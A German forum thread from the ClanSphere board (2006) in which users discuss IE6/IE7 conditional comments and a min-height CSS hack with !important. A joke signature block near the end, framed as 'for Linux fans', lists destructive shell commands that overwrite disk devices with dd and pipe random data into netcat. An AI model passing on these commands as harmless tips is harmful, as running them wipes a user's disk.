Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 7
Seite [1]
globalteam-dom


Try to beat me





Beiträge: 115
# Thema - 13.11.2006 um 16:49 Uhr
Ich habe diese Post geöffnet weil ich momentan 2 Weichen benutze

<!--[if lt IE 7]>
<link href="ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

Vielleicht könnte Ich auf die IE7 Weiche verzichten.

Ich habe gelesen das min-height ist unterstütz.. Wenn ihr habt neuen kenntniss bitte posten ...


------------------
ClanSphere - Makes your website a playmate, just dress her

Dom

Zuletzt editiert von globalteam-dom am 13.11.2006 um 16:50 Uhr (1x Editiert)
Inaktiv
h4ze


Geekboy




Herkunft: Itzehoe
Beiträge: 1433
# Antwort: 1 - 13.11.2006 um 20:31 Uhr
ich arbeite immer nur mit einer css-datei und habe bis jetzt alles gelöst bekommen, auch das unbeliebte min-height.


------------------
gembee.com - Upload your Life!
A Social Filesharing Network
"Wie YouTube, nur für alle Datei-Typen"


Inaktiv
|
Timpe


King for a day





Beiträge: 302
# Antwort: 2 - 15.11.2006 um 12:31 Uhr
und wie ?


Inaktiv
|
Vyper


Rock the board




Beiträge: 71
# Antwort: 3 - 11.12.2006 um 21:58 Uhr
also das min-height-Problem könnte man z.B. so lösen:
 
1.
2.
3.
4.
5.
1. / 2. / ... 
 
min
-height200px;
heightauto !important/* Neue Browser */
height200px/* IE <= Version 6.0 */


Mit den nur einem CSS-File kann man das bei komplexen Layout meist nur mit CSS-Hacks machen, aber da ich die nicht gerne einsetze, benutz ich lieber die Conditional Comments...


------------------


Zuletzt editiert von Vyper am 11.12.2006 um 22:00 Uhr (1x Editiert)
Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 4 - 11.12.2006 um 22:03 Uhr
was genau bewirkt ds !important ?

bzw gibt es ne seite wo solche tricks erklärt werden? hab nemlich noch nie was von !important oder so gehört


------------------
www.laszlokorte.de

Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 5 - 11.12.2006 um 22:58 Uhr
ich hab mir für schiri extra die mühe gemacht bei google "css !important" einzutippen und den ersten link zu kopieren

http://www.devmag.net/tricks/html/html_css_14.htm


Inaktiv
|
Vyper


Rock the board




Beiträge: 71
# Antwort: 6 - 12.12.2006 um 21:11 Uhr
Jo, also wie gesagt, einfach mal den Link von duRiel anklicken oder, um das auf mein Beispiel zu beziehen:
Für die modernen Browser wird eine minimale Höhe von 200px festgelegt (min-height), sie kann jedoch durch das height: auto !important; auch höher ausfallen.
Der IE6 kennt weder min-height, noch die !important Direktive und hat sowieso das Problem, dass er die "height"-Eigenschaft nicht als richtige Höhe ansieht, sondern als eher min-height, d.h. die tatsächliche Höhe kann dann auch durchaus größer werden.

So, wenn ich dann für die modernen Browser die !imporant Direktive nicht schreiben würde, dann würden diese Browser das "height: auto" mit "height: 200px" überschreiben und somit wahrscheinlich den Content abschneiden, falls dieser höher als 200px wird.

Hoffe, das ganze klingt noch verständlich.


------------------


Zuletzt editiert von Vyper am 12.12.2006 um 21:12 Uhr (1x Editiert)
Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 7 - 13.12.2006 um 09:41 Uhr
Naja. Problem hin oder her. Meiner Meinung nach wird der IE immer einer der Brwoser sein, die niemals richtig CSS-basierende Design ohne Tricks richtig darstellen können.

Aber hey: IE 7 kann nun endlich Tabbed-Browsing. Und dafür musste man nicht mal was extra bezahlen ^^


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Antworten: 7
Seite [1]


Sie müssen sich registrieren, um zu antworten.